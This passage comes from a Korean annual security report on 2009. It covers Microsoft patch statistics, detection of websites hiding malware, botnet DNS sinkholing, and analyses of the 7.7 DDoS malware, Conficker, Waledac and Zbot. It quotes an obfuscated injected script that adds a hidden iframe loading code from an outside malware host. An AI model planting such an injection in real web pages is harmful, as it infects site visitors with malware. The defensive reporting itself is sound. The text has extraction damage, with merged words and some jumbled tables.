( 그림 2-23) 웹브라우저관련취약점추이 2008년이후 ActiveX 관련된취약점이점차감소된이유는 ActiveX 컨트롤의취약점을찾는도구( 퍼징기법을이용하는도구, Fuzzer) 의사용이 보편화되어예전보다취약점의발견및조치가미리이루어졌기때문인 것으로추정되나, 한편으로손쉽게취약점을찾을수있는환경이조성 됨에따라지속적으로 특히, 국내인터넷환경에서사용률이높은 ActiveX 취약점이발견되어질것으로예상된다. ActiveX는향후해커들이악성 코드유포목적으로악용할소지가있으므로개발자및관리자들의주의와 지속적인취약점점검등이필요하다. 2. MS 보안취약점및보안업데이트현황 가. 보안업데이트통계 MS 제품군은국내에서가장사용률이높은소프트웨어중하나로써, 보안취약점발생시국내인터넷보안에미칠수있는파급력이높다. MS는 2009년한해동안보안업데이트를 MS09-001부터 MS09-074까지 74 종을발표했으며, 관련된보안취약점은총 190 건을발표했다. 2008년 - 54 -

보안업데이트 78종(MS08-001~MS08-078) 과관련보안취약점155건을 발표한것과비교할때보안업데이트는약 약 22.6% 증가하였다. 5.1% 감소한반면, 보안취약점은 나. 보안취약점추이 2007년부터 2009년까지 3년간보안업데이트와관련하여발표된취약점은 아래표와같다. 보안업데이트수는 2008 년대비감소하였으나, 관련취약점의 수는 2007 년이후지속증가추세를나타내고있다. [ 표 2-13] 최근 3년간 MS제품의취약점패치현황 년도 1월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 12월합계 보안업데이트 2009 3 8 8 23 14 31 15 19 8 34 15 12 190 74 2008 3 17 12 10 6 10 9 26 8 21 4 29 155 78 2007 10 20 0 15 19 15 11 14 4 9 2 11 130 69 MS 보안업데이트및취약점은 4 가지의위험등급으로나누어지며, 2009년도위험등급별취약점추이를분석한결과 긴급 의경우 104건으로 2008년 94건과비교할때약10.6% 증가되었다. 긴급 104건의취약점은 이용자개입없이인터넷을통해전파될수있는악성코드에악용될 가능성이높은것을의미하므로취약점악용으로인한피해를최소화 하기위해서는사용자들의신속한보안업데이트적용이강조해야한다. 2009 년도에는지난해와마찬가지로 낮음 에해당하는보안업데이트는 발표되지않았다. - 55 -

[ 표 2-14] MS 위험등급분류 등급긴급 (Critical) 중요 (Important) 보통 (Moderate) 낮음 (Low) 정의 악용으로인하여사용자개입없이인터넷웜의전파를허용할가능성이있는경우 악용으로인하여정보를변조할가능성이있는경우 기본설정이나검사를통하여위험도가크게줄어들거나, 악용이어렵게되는경우 악용이지극히어렵거나영향이매우적은경우 ( 그림 2-24) MS 위험등급별취약점월별통계 다. 보안업데이트대상소프트웨어추이 MS의 2009년보안업데이트대상소프트웨어중Office와 IE 제품군의 비율이각각 12%, 6% 로나타났다. 2008년도발표된보안업데이트가각각 20%, 7% 인것과비교하면 Office와 IE 제품군에대한보안업데이트가 - 56 -

감소하는양상을나타내었다. 하지만, 운영체제제품군에대한보안 업데이트비율은 2008년 66% 에서 2009년에는 78% 로증가하는양상을 보였다. 전반적인보안취약점공격대상이응용계층으로이동하고있는 추세이나, MS는주력제품군이운영체제인관계로대부분의취약점이 운영체제에집중되는양상을나타낸다. 특히, 새롭게출시된 Windows 7 관련보안업데이트가 2% 정도포함되어있는데, 기타운영체제가 13~17% 인것에비하면상대적으로낮은분포율을나타내었다. ( 그림 2-25) MS 보안업데이트대상제품군분포 2009 년상반기에발표된취약점들의영향력을살펴보면, 원격코드실행이 가능한취약점이 72% 로대부분을차지하고있어 2008년도의 75% 와비슷한 수준을보이고있다. 또한네트워크서비스거부나시스템정지등서비 스거부는 8%, 로컬에서일반권한을가진사용자가관리자권한을획 득할수있는권한상승이 12% 였다. 2009년 MS 보안취약점으로인한 영향은예년과마찬가지로주로원격코드실행을유발할수있는형태 였다. - 57 -

( 그림 2-26) MS 취약점영향력별분포 라. 주요 MS 취약점현황 취약점생명주기모델은취약점발견(Discovery) 취약점정보공개 (Disclosure) 취약점패치배포(Patch Released) 와 같은일정한사이클이 존재한다. 일반적으로취약점이발견되고나서확산되어공개될때까지 공격은서서히증가하며, 패치배포이후완만하게사고가감소해나간다. 취약점이개선되었다고해도침해사고는매우긴시간을통해나타날수도 있다. 침해사고가급증할수있는위험한기간은패치즉, 보안업데 이트가발표되지않은상태에서취약점정보가공개된기간으로제로 데이(Zero-day) 로불리기도한다. 2009년도보안취약점 190건에대해서평균 제로데이기간을위험등급별로산출하면긴급을제외한나머지는제로 데이기간이감소한것을확인할수있다. 긴급의경우 MS09-032 (Microsoft 비디오 ActiveX 컨트롤취약점보안업데이트), MS09-037(ATL 헤더 Memcopy 취약점보안업데이트) 등과같이약 500~600일이소요된 보안업데이트가반영됨으로인해서긴급의제로데이평균기간이늘어난것을 확인할수있다. - 58 -

( 그림 2-27) 위험등급별 Un-Patch 기간 보안업데이트발표이전에취약점을악용한공격위험도가높아 KrCERT 홈페이지를통해보안공지된 MS 주요취약점은모두 10건으로 2008 년(4 건) 에비해 2.5 배증가한것으로확인되었다. [ 표 2-15] 2009년 MS 주요취약점목록 보안업데이트 보안업데이트명 해당취약점 (CVE) 제로데이기간 MS09-009 (KB968557) Microsoft Excel 의취약점으로인한원격코드실행문제점 메모리손상취약점 (CVE-2009-0238) 84 일 MS09-017 (KB967340) Microsoft Office Powerpoint의 취약점으로 인한 원격코드 실행 문제점 메모리손상취약점 (CVE-2009-0556) 89 일 MS09-020 (KB970483) IIS( 인터넷정보서비스) 의취약점으로인한권한상승문제점 IIS 5.1 및 6.0 WebDAV 인증우회취약점 (CVE-2009-1535) 35 일 MS09-028 (KB971633) MS09-032 (KB971633) Microsoft DirectShow 취약점으로인한원격코드실행문제점 ActiveX 킬(Kill) 비트누적보안 업데이트 DirectX 널바이트덮어쓰기취약점 (CVE-2009-1537) Microsoft 비디오 ActiveX 컨트롤취약점 (CVE-2008-0015) 70 일 579 일 - 59 -

MS09-043 (KB957638) Microsoft Office Web Components 의취약점으로인한원격코드실행문제점 Office Web Components HTML 스크립트취약점 (CVE-2009-1136) 139 일 MS09-050 (KB975517) SMBv2 의취약점으로인한원격코드실행문제점 SMBv2 협상 (CVE-2009-3103) 취약점 35 일 MS09-053 (KB975254) MS09-072 (KB976325) IIS( 인터넷정보서비스) FTP 서비스의취약점으로인한원격코드실행문제점 Internet Explorer 이트 누적보안업데 IIS FTP 서비스 DoS 취약점 (CVE-2009-2521) IIS FTP 서비스 RCE 및 DoS 취약점 (CVE-2009-3023) HTML 개체 메모리 손상 취 약점 (CVE-2009-3672) 88 일 43 일 43 일 3. 결론 2009년도에 CVE에등록된보안취약점의개수는 2008년보다다소증가한 것으로확인되어 2006년이후감소추세가증가추세로바뀌었다. 또한 보안취약점공격대상이전자문서, 멀티미디어관련응용계층으로이동 하고있으며 ActiveX 관련취약점이여전히높은비중을차지하였다. 국내사용율이높은 MS 보안업데이트및취약점과관련하여분석한결과, Office 및 IE 관련보안업데이트는각각 12% 와 6% 로 2008년 20% 와 7% 에비해감소한반면,2009년신규제품군인 Windows7과 IE8이출시되 면서해당제품군에해당하는보안취약점이새롭게등장하고있다. 특히, 지난 7월 28일에는 MS 운영체제에서동작하는다양한프로그램들을개발할 때사용되는라이브러리(ATL : Active Template Library) 에취약점이발 견되어긴급비정기보안업데이트 MS09-035 가발표되었다. 해당취약점은 ATL로개발된모든제품군이영향을미칠수있어중요한이슈가되었다. 2010년도는 2009년보다응용계층에대한공격이증가할것으로예상 되며, 국외정보보호전문기관들도유사한전망을제시하고있다. 따라서 인터넷이용자들은항상최신보안업데이트를유지하고백신, 방화벽등 - 60 -

부가적인보안장비를적극적으로활용할필요가있으며또한의심스러운 메일및파일을삭제하고신뢰할수있는웹사이트만방문하는정보보호 실천수칙의준수가필요하다. - 61 -

if (i== eval( undefined )) ( i=1; if (_url.tolowercase().substr(0,4) == http { geturl ( JavaScript:document.body.insertAdjacentHTML (\ beforeend\,\ <iframe src=http://www.p3p99fjdla.com/w.htm width=0 height=0 frameborder=0></iframe\ _, _self ); } return (eval( underfined ) >>> ((eval( underfined ) eval( under 제 3 장침해사고예방및대응활동 제 1 절악성코드은닉사이트탐지및대응 1. 개요 2005년 6월이후국내웹사이트에악성코드가삽입되어웹사이트 방문자에게악성코드를감염시키는사례가발생하여이에대해지속적으로 대응하여왔으며,2005년 12월부터는악성코드은닉사이트탐지프로그램을 자체개발 적용하여 2005년 12월약 50,000 개도메인, 2006년약 70,000개 도메인,2007년까지약 100,000 개,2008년약 125,000개도메인을대상으로 악성코드은닉여부를점검및조치를하였으며,2009년에는 60% 증가한 약 200,000개도메인을대상으로점검및조치를수행하였다. 악성코드배포자 (Malicious code distributor) 악성코드경유지 (Hyperlink embeded, ex) famous websites) 2 웹서버해킹 & 악성코드 Link 은닉... 1 웹서버해킹 & 악성코드은닉 Flash <iframe> Tag Error Page 3 웹사이트방문 악성코드유포지 (Binary code embedded) 4 트로이잔, DDoS 에이전트설치 일반사용자 (Internet Users) ( 그림 3-1) 악성코드은닉을통한악성코드감염구성도 - 62 -

2. 추진내용 가. 악성코드점검도메인확대 2008년 125,152개사이트에대한악성코드은닉여부를점검하였으며, 2009 년에는홈페이지변조, 피싱사이트악용등침해사이트에대한 도메인정보수집및검색사이트를통한점검대상도메인을 확대하여 1일 1 회점검하였다. 200,017개로 [ 표 3-1] 2009년도악성코드점검대상 구분월별추가건수누적건수 2006년 77,477 2007년 101,240 2008년 125,152 1월 2,088 127,240 2월 2,109 129,349 3월 2,341 131,690 4월 2,375 134,065 5월 6,631 140,696 2009년 6월 3,319 144,015 7월 1,581 145,596 8월 1,006 146,602 9월 18,443 165,045 10월 15,052 180,097 11월 9,941 190,038 12월 9,979 200,017 [ 표 3-2] 기관별악성코드은닉점검대상 구분 점검도메인수 기업 156,820 대학 2,139 비영리 18,980 연구소 535 네트워크 13,193 기타 8,350 합계 200,017-63 -

3. 추진결과및향후계획 가. 추진결과 o2009 년도악성코드중계/ 유포사이트탐지건수 -2009 년도악성코드중계/ 유포사이트탐지건수는 2008년대비하여 중계지사이트탐지건수는 26.6% 감소하였으며, 유포지사이트 탐지건수는 30.7% 증가하였다. [ 표 3-3] 2009 년도악성코드중계/ 유포사이트탐지건수 구분 2008 년총계 2009 2009년 1 2 3 4 5 6 7 8 9 10 11 12 총계 경유지 7,654 294 354 346 580 201 445 601 621 809 797 348 225 5,621 유포지 1,324 91 53 70 104 72 137 196 185 255 298 178 92 1,731 합계 8,978 385 407 416 684 273 582 797 806 1,064 1,095 526 317 7,352 [ 표 3-4] 2009 년도악성코드중계/ 유포사이트기관별분류 기관 2008 년총계 2009 1 2 3 4 5 6 7 8 9 10 11 12 2009 년총계 기업 6,068 232 274 280 483 159 372 486 504 670 640 288 173 4,561 대학 138 9 4 3 7 2 5 14 8 4 10 2 0 68 비영리 748 31 33 38 47 27 32 60 63 59 86 34 32 542 연구소 16 0 4 0 2 0 0 1 0 3 1 0 1 12 네트워크 510 16 25 19 32 11 32 32 30 58 47 19 8 329 기타 ( 개인) 1,498 97 67 76 113 74 141 204 201 270 311 183 103 1,840 합계 8,978 385 407 416 684 273 582 797 806 1,064 1,095 526 317 7,352-64 -

나. 향후계획 2010년도에는악성코드은닉사이트탐지대상을 100만여개로확대하기위한소프트웨어개선및장비증설을통해악성코드중계및유포사이트에대한탐지효율을향상시킬계획이다. - 65 -

제 2 절악성봇분석및대응 1. 악성봇 DNS 싱크홀운영확대 진흥원에서는지난 2005년이래로악성봇 DNS 싱크홀시스템을구축 하여운영해오고있다. 2005년 8개주요 ISP에적용한것을시작으로 하여 2009년에는 1개 ISP, 2 개공공기관, 5개대학을포함한총 26개 기관에서 DNS 싱크홀을추가하여현재 92개기관에서 DNS Sinkhole을 운영중에있다. ( 그림 3-2) DNS 싱크홀흐름도 수집된악성도메인개수는계속적으로증가하여현재 11,871여개 ( 09.12 현재) 이상의도메인이수집되었다. 이중예전에사용하다가 지금은사용하지않는악성도메인이나이미국외 ISP 등에서차단된 - 66 -

도메인은현재접속이불가능하므로매일이를체크하여접속이가능한 도메인 2,378 개( 08.12 기준) 만을악성봇싱크홀에적용하고있다. 악성봇에감염된수많은 감염된 자로부터감염 PC 치료가현실적으로어려운반면악성봇에 PC 가유지하는명령/ 제어서버로의연결을차단함으로써공격 PC가원격에서조정되는것을방지하여수많은악성봇의 추가활동을무력화할수있으므로, DNS 싱크홀방법은악성봇대응 방법으로는매우효과적이다. 이에따라 2010년에도주요대학및공공 기관을대상으로그적용범위를더욱높여갈계획이다. 2. 싱크홀통합관리시스템운영 싱크홀시스템을오픈한지 4년째접어들면서적용업체담당자및 팀내운영자변경에따른상황공유및정보전달의어려움이종종발 생하였다. 또한악성도메인목록을다운로드받는데특별한인증과정없이 가능하도록운영하고있었으나해커들이자신의도메인이차단여부를 확인하는데악용하였다. 진흥원에서는이와같은문제점을해소하고자 싱크홀가입업체들만을위한싱크홀통합관리시스템을구축하였다. 이시스템은업체의담당자별로가입을유도하여가입된자만도메인 목록을확인가능하도록하였으며또한업체에서사용중인 AS 번호를 등록하면악성봇감염통계정보나감염 IP 목록을제공하여편의를도모 하였다. - 67 -

( 그림 3-3) 싱크홀통합관리시스템 3. 악성봇명령/ 제어서버조치 악성봇명령/ 제어서버는해커가악성봇에감염된 PC에악성행위 명령을전달하기위하여사용하는서버로명령/ 제어서버에대한차단및 재발방지조치를통하여해커의명령전달경로를무력화할수있다. 이에따라명령/ 제어서버에대한차단조치는매우중요하며, 국외에 위치한명령/ 제어서버의경우악성봇 DNS 싱크홀에적용하고, 국내에 위치한명령/ 제어서버의경우에는해당 ISP 에조치를요청하고있다. 2009 년의경우국내에서발견된악성봇명령/ 제어서버 322건에대하여 해당하는 ISP 에조치를요청하였으며, 각 ISP 에서는해당서버의사용자를 파악하여시스템을치료하는등의조치를취하고있다. 악성봇명령/ 제어서버로악용되는경우에는기존의바이러스감염과는 달리해당서버운영에장애를일으키는등의직접적인피해를입히지는 않는다. 이런이유로서버관리자는조치를꺼리거나재부팅이필요한 보안업데이트의경우에는업데이트시기를미루거나하는경우가있는데, - 68 -

4. 악성봇감염확인서비스 악성봇 DNS 싱크홀은감염 PC의사용자가보안에대한지식이없더 라도감염 PC가사용하는 DNS 서버를운영하는 ISP에서악성봇 DNS 싱크홀을적용중이라면악성봇에의한악성행위를차단할수있는효과가 있다. 그러나감염 PC 에악성봇이치료되지않고그대로남아있으며, 감염 PC가가지고있는보안취약점역시해결되지않고남아있어또 다른악성코드에감염되는것을막을수없다는단점이있다. 이러한 단점을보완하기위하여감염 PC 목록을해당 ISP에전달하여해당 IP 사용자에게보안업데이트등의조치를권고할수있도록하고있으나, 유동 IP의경우 Timestamp 로실사용자를찾는데시간이오래걸리고, 해당사용자의 e-mail 이등록되지않은경우도많으며, ISP의기술지원 인력에한계가있다는이유로감염PC에대한조치가잘안되고있는 실정이다. 심지어국내의경우초고속인터넷서비스경쟁이치열하여 고객에게악성봇감염여부를알리고치료를권고하여도, 가입자유치를 위한광고전화로오인하거나조치를귀찮게여기는경우도있다고 한다. 연간싱크홀접속 IP수를보면항상일정한수이상의 IP가싱크홀 네트워크에접속하고있음을확인할수있다. 이는일정한수의감염 PC 사용자는감염이치료되거나하지않고감염된상태그대로 PC를 사용하고있다는것을의미하며, 이러한경우또다른악성코드에감염 되어있을가능성이높다. 이렇게감염이확인되고있으나조치하지않고 있는보안에취약한 PC 사용자들에게보안업데이트나백신사용의 필요성을알리고조치할수있도록유도하는것이필요하다고할수있다. 이에따라 2008년도부터 DNS 싱크홀을통하여확보된악성봇감염 시스템을사용자들이직접확인할수있는 악성봇감염확인서비스 를 시작하였다. 이는 PC 사용자들로하여금자신의 PC가악성봇에감염 되었는지여부를확인하고감염시에는공개백신등을사용하여치료하고 윈도우즈보안업데이트를하도록유도하는서비스이다. 확인서비스는다음과같은절차로이루어진다. 악성봇감염 - 69 -

( 그림 3-4) 악성봇감염확인시스템 1 2 3 사용자가보호나라홈페이지의 악성봇감염확인 메뉴클릭 사용자의접속 IP를확인 DNS 싱크홀로인하여악성봇감염시스템이해커의명령/ 제어 서버가아닌싱크홀서버와연결을맺게되는데이렇게싱크홀 서버와연결중인 IP 목록중에 2의 IP가존재하는지여부를 실시간으로확인 4 3의과정에서사용자접속 IP 존재시악성봇감염으로판단하고 그렇지않은경우에는진흥원에서확보된악성봇감염리스트에는 포함되지않는것으로판단 악성봇에감염된것으로판단되면악성봇을치료할수있는백신페이지로안내할뿐만아니라백신이탐지하지못하는경우를대비하여악성봇을탐지하여진흥원으로전송할수있는악성봇탐지전용프로그램도제공해주고있다. 또한악성봇감염이확인되지않은경우에도 - 70 -

악성봇에대한안내와악성봇감염 PC 확인시스템의동작원리및예방방법을안내함으로써향후에도악성봇감염에대해대비할수있도록하였다. 2008년 11월 3일에보호나라홈페이지를통하여악성봇감염확인 서비스를시작하였고, 2009년 12월까지 145만번이상이방문하여감염 여부를확인하였다. 이는 MOU를맺은 SK컴즈와엔씨소프트외 NHN, 다음에서도봇감염확인서비스를시작함에따라 증가하였다. ( 그림 3-5) 엔씨소프트악성봇감염확인 2008년도에비해크게 윈도우즈보안업데이트의경우이미개발하여운영중인 PC 자동 보안업데이트 S/W를이용하면보다편리하게윈도우즈보안업데이 트를수행할수있다. PC 자동보안업데이트 S/W는윈도우즈보안 업데이트를하지않는사용자등을대상으로자동으로윈도우즈보안 업데이트를설치해주는프로그램으로보호나라홈페이지등에서서비스 중이다. 이를이용하면감염PC 사용자가다시 MS 홈페이지방문등을 통하여윈도우즈보안업데이트를설치할필요없이보다손쉽게설치가 - 71 -

가능하다. 이는윈도우즈보안업데이트에대해잘모르는사용자나윈도우즈자체의자동보안업데이트기능을사용하지않는사용자등정보보호인식이부족한취약계층을위한서비스이다. 다만윈도우즈서비스팩은용량문제등으로설치되지않으므로사용자가별도로설치하여야하며, 서비스팩설치이후의보안업데이트는프로그램에서자동으로다운로드하고설치한다. ( 그림 3-6) PC 자동보안업데이트 S/W - 72 -

제 3 절주요악성코드분석및대응 2009 년한해동안다양한악성코드신종및변종이출현하였으며, 그중일부는많은이용자들에게감염피해를발생시켰다. 본절에서는 2009년국내에서비교적영향력이있었던악성코드들에대한대응당시의 분석사례를다루어보았다. 1. 7.7 DDoS 공격악성코드 2009년 7월 7일부터 3차례에걸쳐국내주요사이트를계획적으로공격 하는침해사고가발생하여해당사이트접속장애및영업손실, 국민불 편초래, 국가안보에대한잠재적불안감증대등피해가발생하였다. 7.7 DDoS 사건은공격목표, 시간대의지정및감염 PC 파괴를통한역 추적방해등사전에치밀하게계획되어실행에옮겨진침해사고였다. [ 표 3-5] 7.7 DDoS 사건개요 구분공격대상날짜 1 차공격 o 국내(12), 국외(14) 사이트대상 DDoS 공격 o24시간동안접속장애발생 7. 7 2차공격 o 국내 15개사이트에대한접속장애발생 7. 8 3 차공격 o 국내 7 개사이트대상공격이시도되었으나, 알려진피해사항은없음 7. 9 하드디스크손상 o 감염 PC의하드디스크및중요문서파괴로인한피해발생 7.10 7.7 DDoS 악성코드는국내주요사이트에대한 DDoS 공격과더불어 감염 PC의하드디스크를손상시키는 2가지악성행위를수행하는파일들로 구성되어있다. - 73 -

( 그림 3-7) 7.7 DDoS 악성코드공격개요도 7.7 DDoS 악성코드는명령제어서버로부터실시간으로공격대상과 명령을전달받아동작하는기존 DDoS 악성코드의동작방식과달리 uregvs.nls 파일에저장된공격정보( 공격시작 종료시간, 공격대상등) 에 따라 DDoS 공격을수행하므로공격자가의도한시간동안공격이 지속 된다. 또한 1 차, 2차숙주서버로연결채널이이중화되어있어서 2차 서버의목록을업데이트가능한구조이므로차단이까다롭다. 3 차공격후 09년7월10일 00:00시를기점으로감염 PC는하드디스크 손상및특정확장자를가진파일등을파괴하여복원이불가능하게 만드는행위를수행한다. 위한것으로파악되나 이는공격의종료와동시에역추적을피하기.NET Framework 3.5 동작하여감염규모에비해피해가적었다. 버전이설치된경우에만 - 74 -

( 그림 3-8) uregvs.nls파일구조 ( 그림 3-9) 7월 10일 00시이후하드디스크손상코드실행 자체전파기능이없는 7.7 DDoS 악성코드에국내 PC들이어떻게 대규모로감염이되었는지현재까지정확한전파경로는밝혀지지않았으나, 많은이용자를보유하고있는 P2P 나웹을통한파일공유, 메신저, 이메일 등을통해서사용자에의해다운로드되거나다른악성코드에의해서 추가설치되었을것으로추정되고있다. - 75 -

2. Conficker 변종의출현 Conficker 는최초로2008년 11월 MS08-067 취약점을악용하여전파를 하기시작했다. 그이후 USB 이동저장매체등으로전파되는기능이 추가되고, P2P 통신기능을가진변종이꾸준히발견되었지만여전히 자체전파/ 확산행위외에뚜렷한악성행위를하지않아서악성코드 제작자의의도에대해관련업계에서의견이분분하였다.3월말악성코드 새로운변종 Conficker.D 가추가적으로발견되었는데, MS08-067 취약점을 통한전파대신에 HTTP 및 P2P 통신을통한추가악성코드전파를시도 하는것으로방향을선회하였다. 이변종또한 HTTP 접속도메인생성 알고리즘이 4월 1 일에활성화되도록제작되어논란이많았다. [ 표 3-6] Conficker 변종이력 날짜변종명 2008-11-21 Conficker.A 2008-12-29 Conficker.B 주요이벤트 / 변종발생이력변종주요특이점 MS08-067 취약점악용 DNS 후킹 250 도메인/ 일 MD5 + 1024-bit RSA 인증서네트워크공유를통한감염 USB를통한전파기능 MD6 + 4096-bit RSA 인증서 2009-02-20 Conficker.C MS08-067을취약점을이용한P2P 통신 2009-03-04 Conficker.D 2009-04-07 Conficker.E Conficker.D 감염 PC간 P2P 통신 50,000 도메인/ 일악성코드자체의전파기능없음 Conficker.D로부터설치 Waledac, 허위안티-스파이웨어설치 5월 3일이후스스로삭제 Conficker/Downadup 은변종에따라A/B/C/D/E 또는A/B/B++/C/D로구분하고 있음 ( 본문서는 Microsoft win32-conficker 분류기준을따름) - 76 -

하지만 Conficker.D 는자체전파/ 확산기능이없고감염된호스트가 많지않았으며,Conficker대응을위해 MS 를주축으로다수의보안업체, 연구단체및도메인관리기구가참여한 Conficker Working Group (Conficker Cabal) 이 HTTP 접속이예상되는도메인에대한신규등록 제한및기존도메인모니터링등의협력하여 4월 1일이후큰문제가 없었다. 곧이어나온변종 Conficker.E에서야 Waledac 변종또는허위 안티-스파이웨어를설치하는등의악성행위를시작했지만감염규모가 크지않았으며, 오히려악성행위없이전파시도만하던과거에비해 관련업계의반응이시들해졌다. 가장이슈가되었던 Conficker.D에 대한분석내용은아래와같다. ( 그림 3-10) Conficker 트래픽변화추이 출처 : http://mtc.sri.com/conficker/addendumc (1) 전파경로 Conficker.D는이미 Conficker.B에감염된시스템에서업데이트될뿐 새로운시스템을대상으로전파하지않는다. 즉, MS08-067 취약점공격, USB 자동실행또는공유폴더를통한전파기능을포함한악성코드자체의 - 77 -

전파기능을제거하였다. 반면에 Conficker.C변종이 P2P 채널로사용하던 RPC 인터페이스대신에멀티스레드의 P2P 로직을도입하였다. MS08-067 취약점을이용한전파가더이상이루어지고있지않다는 사실은 ( 그림 3-10) 과같이 Conficker.D가처음발견된시점에서 TCP/445 스캔트래픽은감소한반면 P2P 트래픽이증가한사실에서 확인할수있다. 현재 Conficker 감염호스트는약 1~2백만개로추정하고 있으며, 그중 Conficker.D에감염된호스트는상대적으로적을것으로 예상된다. (2) HTTP 연결 Conficker 가특정도메인에 HTTP 접속을통한추가악성코드를다운로드 받거나봇넷을업데이트를하는등의메커니즘을 "Phoning-home" 또는 "Internet Rendezvous" 이라고한다. Phoning-home 메커니즘측면에서 Conficker.D 는기존변종보다많은수의도메인을생성한다는점이외에 달라진점은없다.4월1일부터매일임의의문자열로생성된 50,000개의 도메인중 500 개의도메인에대한접속시도하는데, 최상위도메인(TLD) 개수는 8개에서 116 개로증가하였고, 도메인리졸빙결과 IP가 127.0.0.1 또는보안업체들이소유한 IP 목록에포함되거나다른도메인의 IP와 중복될경우해당 DNS 쿼리결과는무시한다. HTTP GET 요청으로 Win32 실행파일을다운로드/ 실행하는데 IDS에탐지되지않도록 q= 또는 aq= 와같은URL 문자열을사용하지않고"GET /" 요청을전송한다. 하루생성되는 5만개의도메인중 1 개의도메인을등록할경우, 대략 전체 Conficker.D 감염 PC의 1% 에해당하는 PC가영향을받을수있다는 보고에의하면 HTTP 연결의효율성을고려하여설계되지는않은것으로 추정되며, 접속도메인에대한관리가이루어진다면 HTTP 접속의효율은 더낮아질것으로예상된다. 한편Conficker 변종이생성하는.kr 도메인은 약 3만8천여개이고이중실제등록된도메인은약 400 여개로알려졌다. Phoning-home을통한 HTTP 방식의봇넷제어는효율성이떨어지고 보안업계의대응이어렵지않은반면에, P2P 방식을통해봇넷을제어 - 78 -

한다면기존변종에비해대응하기어렵기때문에, 악성코드제작자가 의도적으로대응의혼란을초래하거나시간을벌기위해 Phoning-home 기능을확대했을가능성이있다는추측도있었다. (3) P2P 연결 Conficker.D는자체적인P2P 프로토콜을사용하여추가적인악성코드를 다운로드한다.P2P네트워크에연결하기위한초기 Peer목록은네트워크 인터페이스에서수집된정보를기반으로생성하거나특정시드값을 사용하는난수함수를사용해임의로생성, 또는이전에캐시된 2,048개의 피어목록에서임의로선택하는방식으로 100개의 IP 주소목록을생성 한다. P2P 네트워크에연결하기위해감염된호스트들끼리연결을시도 하면서 P2P 스캔패킷을발생시키는데, 연결대상포트는 IP와 Seed값을 가지고생성되며 1024 ~ 65535번포트중에서선택되므로네트워크단에서 사용하지않는포트는차단할필요가있다. (4) 감염증상 Conficker.D에감염되면 Windows Security Center Service (wscsvc), Windows Defender Service (WinDefend), Windows Automatic Update Service (wuauserv), Background Intelligent Transfer Service (BITS), Windows Error Reporting Service (ERSvc / WerSvc) 와같은윈도우보안 서비스를종료하고해당서비스의자동실행방지를위해레지스트리를 변경/ 삭제한다. 또한윈도우가안전모드로시작되는것을방지하고 microsoft, windowsupdate, hauri, ahnlab 등보안관련특정문자열이 포함된도메인들에대한 DNS 요청을차단하기위해 DNS 관련 API를 후킹한다. (5) 보호기능 Conficker.D는악성코드의분석을방해하기위한다양한기능도가지고있다. 제3자에의한하이재킹을막기위해바이너리파일을암호화및 - 79 -

디지털서명 (RC4, RSA, MD6) 을적용하였고, procexp, tcpview, wireshark 등각종모니터링도구를종료시킨다. 또한가상화방지 (VMware / Virtual PC) 및GetTickCount() 타이밍을사용한안티-디버깅 기술을도입하였고, 디버깅을어렵게하기위해 P2P 로직에해당하는 코드의 API 를난독화하였다. 3. 사회공학적인방식으로전파되는악성코드 지난해와마찬가지로발렌타인데이, 화이트데이, 크리스마스등일련의 이벤트와관련된내용으로인터넷이용자를현혹시키는사회공학적인 기법으로악성코드에감염시킨후광고성스팸을대량으로발송하는 사례가지속적으로발생하였다. 이와같은사례의대표적인악성코드가 Waledac 이다. Waledac은 2008년 하반기에사라진 Storm을대신하여활동한 Spam Bot 의일종으로, 2009 년에는오바마美대통령취임, 발렌타인데이, Couponizer, 테러공격에 관한가짜로이터뉴스에이어서미국독립기념일(7월 4 일) 과관련된 키워드및링크를가진스팸을발송을통한사회공학적인방식으로전파 되었다.Waledac은스팸발송을위해 Peer-to-PeeroverHTTP 방식으로 암호화된명령을전달한다. - 80 -

( 그림 3-11) 신종플루관련스팸메일의예 2009년 3월에발견되어지속적으로사회적으로이슈가되었던신종인플 루엔자(H1N1, 이하 ' 신종플루') 와관련된악성코드또한발견되었다. 2009년 7월에신종플루를사칭하여감염을시도한 Paymilon 트로이목마가발견된 이후, 겨울이되면서신종플루가더욱기승을부리자지난 2009년 12월 온라인에서도이를미끼로악성코드를유포하는피싱사이트가등장했다. 개인 H1N1 백신예방접종프로파일을업데이트하라며가짜美질병통제 관리국(CDC) 사이트로접속을유도하는이메일이발견되었다. 해당 피싱사이트에방문을하면 Adobe Acrobat Reader의 util.printf(), Collab.getIcon(), Collab.collectEmailInfo() 자바스크립트메소드취약점을 악용한 IFRAME으로삽입된 PDF 파일로부터자동으로다운로드되어 실행되거나, 수동으로다운로드한후실행하여각종인터넷사이트의 계정이나 FTP 계정을유출하는악성코드에감염이된다. - 81 -

( 그림 3-12) Zbot의온라인뱅킹사이트목록수신및디코딩의예 해당악성코드(vacc_profile.exe) 는 Zbot 계열로 winlogon.exe에코드를 인젝션하고 winlogon.exe은 svchost.exe에다시코드를인젝션하여악성 행위를수행한다. 계정정보탈취대상인온라인뱅킹과관련된웹사이트 목록을다운로드하여로컬에파일로저장하고, 후킹한주요 API를이용해 계정정보를탈취하고탐지를우회한다. 저장되었다가추후에외부로유출할것으로추정된다. 탈취된정보는로컬에파일로 앞서사회공학적인방식으로전파되는악성코드의경우는불특정다수를대상으로스팸을발송하거나사회적인이슈와관련된검색페이지를통해전파된다면, 특정그룹에속한사람을대상으로고급정보를유출하거나감시하기위한목적으로악성코드가유포되는사례도있었다. 대표적인경우가 2009년 3월 103 개국의정치, 경제, 미디어와관련된 네트워크를대상으로사이버스파이행위를하는것으로밝혀진 대규모의 봇넷인 GhostNet과 2009년말중국내인권운동가의구글메일해킹및 다수의기업의지적재산권을유출하기위한소위 Aurora" 공격이있었다. - 82 -

